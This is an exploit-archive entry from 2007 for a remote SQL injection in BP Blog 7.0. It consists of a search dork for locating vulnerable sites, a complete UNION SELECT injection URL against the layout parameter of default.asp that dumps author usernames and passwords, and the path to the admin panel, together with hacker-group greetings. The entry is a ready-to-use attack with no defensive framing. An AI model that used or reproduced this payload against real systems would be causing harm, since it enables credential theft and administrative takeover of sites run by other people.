[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : BP Blog 7.0 (default.asp layout) Remote SQL Injection Vulnerability
# Published : 2007-03-12
# Author : BeyazKurt
# Previous Title : OES (Open Educational System) 0.1beta Remote File Inclusion Vuln
# Next Title : PostNuke Module phgstats 0.5 (phgdir) Remote File Include Exploit


#####################################
# BeyazKurt <B3yazKurt@Hotmail.Com>
# Script : BP Blog
# D0rk   : "Powered by BP Blog 7.0"
# thnx   : Forever.slam and all WorldHackerz Team!
#
# WorldHackerz Mirr0r'da Taht Bizimdir (h) :=)
#####################################
-------
Exploit :
http://www.Site.Com/Path/default.asp?layout=-1%20%20union%20select%201,fldauthorusername,fldauthorpassword,1,1,1,1%20from%20tblauthor%20where%201=1
Admin Panel : admin_default.asp

# www.Syue.com [2007-03-12]